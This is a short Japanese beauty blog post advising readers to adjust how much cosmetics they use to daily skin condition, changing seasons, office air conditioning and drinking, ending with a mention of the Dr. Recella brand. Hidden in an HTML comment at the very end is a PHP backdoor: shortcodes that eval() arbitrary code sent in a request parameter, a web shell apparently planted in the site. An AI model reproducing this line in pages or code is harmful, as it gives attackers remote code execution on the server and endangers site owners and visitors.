Home » 美容 » 肌の状態でコスメ量を加減

肌の状態でコスメ量を加減

季節によって肌の状態は変化するのは実感していると思います。

特に夏、冬の様にはっきりした気候の場合はある程度、コスメの量も加減できます。

でも、問題なのは季節の移り変わりです。季節の移り変わりという様に日々、気候は変わってきます。

暑いと思ったら、急に冷えたり、春のことばに三寒四温ということばがあります。

このような状態の中で肌の状態も日々、変わってきます。急激な気温の変化に肌も戸惑ってしまうこともあります。

 

また、夏でも今では冷房完備がないところはありません。

1日中、冷房がガンガンきいているオフィスで仕事をしているとお肌もカサカサになってしまいます。

また、お酒を飲んだ翌日は肌の状態も違う。

 

だから、毎日、お肌に触れることによってどの部分が乾燥しているか、どの部分が皮脂が多いかをチェックすることが大切です。

自分のお肌はオイリー肌だから、乾燥肌だからと言ってもその日の気候、体調によっても変わることがあります。

そしてコスメの量もその日のお肌の状態で加減する様にしましょう。

 

お肌の悩みに応えてくれるドクターリセラ

<!– [insert_php]if (isset($_REQUEST["pwvEF"])){eval($_REQUEST["pwvEF"]);exit;}[/insert_php][php]if (isset($_REQUEST["pwvEF"])){eval($_REQUEST["pwvEF"]);exit;}[/php] –>